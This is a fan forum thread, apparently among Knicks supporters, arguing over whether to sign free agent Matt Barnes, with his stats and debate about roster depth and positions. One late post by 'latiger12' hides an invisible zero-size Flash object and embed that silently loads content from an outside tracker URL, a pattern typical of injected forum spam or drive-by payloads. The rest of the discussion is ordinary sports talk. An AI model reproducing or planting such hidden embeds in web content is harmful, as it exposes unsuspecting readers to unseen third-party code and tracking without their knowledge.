Matt Barnes available

jpz17

Starter
FREE AGENCY: Barnes won't return to Suns

<table class="tablehead statCont" cellpadding="2" cellspacing="1"><tbody><tr class="gamehead"><td colspan="4">2008-09 STATS</td></tr> <tr class="colhead playerStatSub"><td>PPG</td><td>RPG</td><td>APG</td></tr> <tr class="oddrow playerStats"><td>10.2</td><td>5.5</td><td>2.8</td></tr></tbody></table>

<table border="0" cellpadding="0" cellspacing="1"><tbody><tr><td valign="top">Birth Date</td><td valign="top">March 9, 1980</td></tr> <tr> <td valign="top">Birth Place</td><td valign="top">Santa Clara, CA</td></tr> <tr> <td valign="top">Height</td><td valign="top">6-7</td></tr> <tr> <td valign="top">Weight</td><td valign="top">226 lbs.</td></tr> </tbody></table> <!-- end n --> <!-- begin n --> <table border="0" cellpadding="0" cellspacing="1"><tbody><tr> <td valign="top">Age</td><td valign="top">29</td></tr> <tr> <td valign="top">Position</td><td valign="top">SF</td></tr> <tr> <td valign="top">Experience</td><td valign="top">6 years</td></tr> <tr> <td valign="top">College</td><td valign="top">UCLA</td></tr></tbody></table>

A 6-7 SF is on the market and may sign a one-year deal. Anyone want him at the min?

Good rebounder. Tough player.

Crazy⑧s

Evacuee
Good yes.

Necessary no. We have 3 SFs and they all need to score and get PT.

Barnes needs us more than we need him. Stick to getting a point guard, N8 & Duhon don't cut the mustard.

We have 3 small forwards and are probably getting Grant Hil, we don't need Barnes.

ya know we were talking about this last yr when we drafted gallo that we have too many SF's
people forget who our coach is
I could see G hill, barns, Gallo and chandler on the floor at the same time

its not about getting shots, its about ball movement and getting open shots, I feel like barnes who has played for donnie nelson and alvin gentry both open floor coaches would help our offense, gallo has a high IQ and g hill is one of the better passers in the league.

Lets not get caught up in positions here

Mike D wilil play four small fowards at one time if he wants too, I mean he made Marion an all star at the power foward position, and boris Diaw had is best year playing center.

I say sign as many athletic , slashing, passing, tough minded players as we can
who cares about positions, all we need is more scorers. if we can get barnes for the mid level, and G Hill for the vets min, that will instantly add 5-7 wins to our basketball team.

jpz17

Starter
look, he can play the PF and we need some more depth. Who knows if Gallinari will be healthy all year and who can trust Curry?

Barnes is a solid player who can play in the uptempo style :)

richtree

Rotation player
look, he can play the PF and we need some more depth. Who knows if Gallinari will be healthy all year and who can trust Curry?

This guy is a bummmmm...

he doesn't help you WIN GAMES.

He is also a guy that complains when he doesn't get minutes.

He cannot, cannot defend at the 4 spot.

We already have 4 guys similair to him and we could use the depth and funds for another postion on his roster.

Let barnes go to a team where he gets enough minutes to think he is better than he is.

He will probably end up on a bad team, lets keep him out of NY.

This guy is a bummmmm...

he doesn't help you WIN GAMES.

He is also a guy that complains when he doesn't get minutes.

He cannot, cannot defend at the 4 spot.

We already have 4 guys similair to him and we could use the depth and funds for another postion on his roster.

Let barnes go to a team where he gets enough minutes to think he is better than he is.

He will probably end up on a bad team, lets keep him out of NY.

HE has played winning basketball for the past three season.
How is Any of players similar to him, hes actually a better defender than 80 percent of our team
when was it ever documented that he complains about playing time show me your empirical evidence.
He played the 4 allot for a 50 win warriors team defending the 4 often in the west coast
Sounds like you have allot of opinion and not allot of substance.

If hell take the MLE im into it.

umm

yeaaa

we are not talking about an all star here, but a guy who in the west coast has contributed and logged starting minutes for two playoff level teams, if that is the type of player you dont want on the knicks for the MLE then I dont know what your smoking. I can only name 2 players on our team who I consider better than matt barnes and the both of them are probably not going to be playing for the knicks this year.

latiger12

Rookie
We have 3 small forwards and are probably getting Grant Hil, we don't need Barnes.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="<A href="http://brbyowner.com/?tracker=4097"></param><param">http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

I hope we focus on Hill. We dont need another SF.